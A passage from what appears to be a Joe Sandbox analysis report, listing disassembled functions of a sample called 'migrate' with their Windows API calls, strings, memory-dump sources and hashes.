                                                                                                                                                                                                      • Part of subcall function 00119DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00119E70
                                                                                                                                                                                                      • Part of subcall function 00119620: CloseHandle.KERNELBASE(000000FF,?,?,001195D6,?,?,?,?,?,00142641,000000FF), ref: 0011963B
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A501
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A532
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                                                                                                    • Opcode ID: ba9a6561a846273348edba898d842d30fbf6a3f84d36b79b7715e4c88c660f8c
                                                                                                                                                                                                    • Instruction ID: 42175c9355e63591b42b703d3a8e9ab6425f6d2893d2517516f0c032b38a6066
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba9a6561a846273348edba898d842d30fbf6a3f84d36b79b7715e4c88c660f8c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5C1C575904604AADB29DB74DC81FEEB7B8BF19300F004569F966E72C2D734AAC4CB61
                                                                                                                                                                                                    Function 0011E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0011E30E
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                      • Part of subcall function 00121DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00151030,?,0011D928,00000000,?,00000050,00151030), ref: 00121DC4
                                                                                                                                                                                                    • _strlen.LIBCMT ref: 0011E32F
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0014E274,?), ref: 0011E38F
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0011E3C9
                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0011E3D5
                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0011E475
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0011E4A2
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0011E4DB
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0011E4E3
                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0011E4EE
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0011E51B
                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0011E58D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                                                                                                    • Opcode ID: 16bdf0e99abb7aa190f78bb5632a18f8441265ef741b81a8dee3bd780c3b181b
                                                                                                                                                                                                    • Instruction ID: 5cb03f1f718c6cb552b34f6984e42d8d892aeadc9a017bba01c79b07bd92536f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16bdf0e99abb7aa190f78bb5632a18f8441265ef741b81a8dee3bd780c3b181b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C819171508301AFD714DFA8CD89AABBBE9FBC8704F04092DF998D7290D774E9858B52
                                                                                                                                                                                                    Function 0013CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0013CB66
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C71E
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C730
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C742
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C754
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C766
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C778
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C78A
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C79C
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7AE
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7C0
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7D2
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7E4
                                                                                                                                                                                                      • Part of subcall function 0013C701: _free.LIBCMT ref: 0013C7F6
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB5B
                                                                                                                                                                                                      • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
                                                                                                                                                                                                      • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB7D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB92
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CB9D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBBF
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBD2
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBE0
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CBEB
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC23
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC2A
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC47
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013CC5F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                    • Opcode ID: cedf2fe04241a87946a2a624ea8a6236a8d1a61eeae6b3a008ad5e5a828eef82
                                                                                                                                                                                                    • Instruction ID: 36c8f7828282fbb3778c742fe9e2b40b6d14c5dd0a351e9d88127d96e342b63b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cedf2fe04241a87946a2a624ea8a6236a8d1a61eeae6b3a008ad5e5a828eef82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB3159316003069FEF21AB78D846B5AB7F9AF20750F105429F588E71A2DF35EC80CBA0
                                                                                                                                                                                                    Function 00129711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00129736
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 001297D6
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 001297E5
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00129806
                                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0012982D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                                                    • API String ID: 1777411235-4209811716
                                                                                                                                                                                                    • Opcode ID: 1bcc26353a920de294a1e5cc8518c0b8b1e560e638426d6f98bb9b8df41e4d4c
                                                                                                                                                                                                    • Instruction ID: 529070be0c2aa827fd9aa78ea5d9c92bac49f35e74c16cb7e4aa20bee76f4150
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bcc26353a920de294a1e5cc8518c0b8b1e560e638426d6f98bb9b8df41e4d4c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2317D721083257BE725AF38BC06F6F779CEF52320F14011DF511961D1EB749A1887A5
                                                                                                                                                                                                    Function 0012D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0012D6C1
                                                                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0012D6ED
                                                                                                                                                                                                      • Part of subcall function 00121FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0011C116,00000000,.exe,?,?,00000800,?,?,?,00128E3C), ref: 00121FD1
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0012D709
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0012D720
                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0012D734
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0012D75D
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0012D764
                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0012D76D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                                                    • String ID: STATIC
                                                                                                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                                                                                                    • Opcode ID: 7fd1b4f7048c9d61e5efc249ab51cc4decc00d333c1b6a63c71b98b4eaf29d7b
                                                                                                                                                                                                    • Instruction ID: 89dab0c8b7ad3550bbe1829dc8666f524ae381042718a47e54d3153b1500947e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fd1b4f7048c9d61e5efc249ab51cc4decc00d333c1b6a63c71b98b4eaf29d7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 581121321403307BE2206B70FC4AFAF766CAF24711F008120FA65E2091DB688E9562B2
                                                                                                                                                                                                    Function 001396F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139705
                                                                                                                                                                                                      • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
                                                                                                                                                                                                      • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139711
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013971C
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139727
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139732
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013973D
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139748
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139753
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013975E
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013976C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: c3957ecb5e13317180667c15ad0086a2199cd529898d5a2a22e2920c7e59aaf0
                                                                                                                                                                                                    • Instruction ID: d1e7118ab3b1852ea708e1c6c9c8aa24e5066ca86bfbe579dd9d36ec10bbecd3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3957ecb5e13317180667c15ad0086a2199cd529898d5a2a22e2920c7e59aaf0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30117276510209AFCF01EF94C982CD93BB5EF24750F5155A5FA088F2A2DF72EE909B84
                                                                                                                                                                                                    Function 00132E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                                                                                                    • Opcode ID: 5c989a3e79d6ba7e701268f7a8abf2717f86c79df6f3fdb543b3de0c5e7cb816
                                                                                                                                                                                                    • Instruction ID: dd8297e59741f05f6e46487c2cc0ab542b478ed5d9e34e0e629e51579d207134
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c989a3e79d6ba7e701268f7a8abf2717f86c79df6f3fdb543b3de0c5e7cb816
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCB16971900209EFCF29EFA4C8819AEBBB9FF24310F14415AF8256B252D735DA52CF95
                                                                                                                                                                                                    Function 00116FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00116FAA
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00117013
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00117084
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetLastError.KERNEL32 ref: 00117AF1
                                                                                                                                                                                                      • Part of subcall function 00117A9C: CloseHandle.KERNEL32(?), ref: 00117B00
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                                                                                                    • Opcode ID: a050ec441001abbe55acbc9db7a8dd2ecf4852a2477399ec15c1f527d976acc0
                                                                                                                                                                                                    • Instruction ID: d862ba35cea69440f87bac70fb4dc5253152dbc13ec306b23dea0a07e986e34f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a050ec441001abbe55acbc9db7a8dd2ecf4852a2477399ec15c1f527d976acc0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A541D6B1D08344BAEB29E7709C82FEEB77C9F25304F004475FA65A72C2D7746AC48621
                                                                                                                                                                                                    Function 0012B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0012B610
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0012B637
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0012B650
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0012B661
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0012B66A
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0012B67E
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0012B694
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                                                    • String ID: LICENSEDLG
                                                                                                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                                                                                                    • Opcode ID: dd932810689cb2f4213d89dd7fccdb6408ef1d63bfc56d6ea7e25417aa1127da
                                                                                                                                                                                                    • Instruction ID: f925d560c9645c8460478168fe6661305f8ec1755f5db384d0bea8da1eb9dc4a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd932810689cb2f4213d89dd7fccdb6408ef1d63bfc56d6ea7e25417aa1127da
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9821C432208225BBD2115F66FC8AF7B3B7DFB4AB51F010418F614E69E0CB9299D1A635
                                                                                                                                                                                                    Function 0012FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,98433B35,00000001,00000000,00000000,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FD99
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FE14
                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0012FE1F
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE48
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE52
                                                                                                                                                                                                    • GetLastError.KERNEL32(80070057,98433B35,00000001,00000000,00000000,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FE57
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE6A
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0011AF6C,ROOT\CIMV2), ref: 0012FE80
                                                                                                                                                                                                    • _com_issue_error.COMSUPP ref: 0012FE93
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
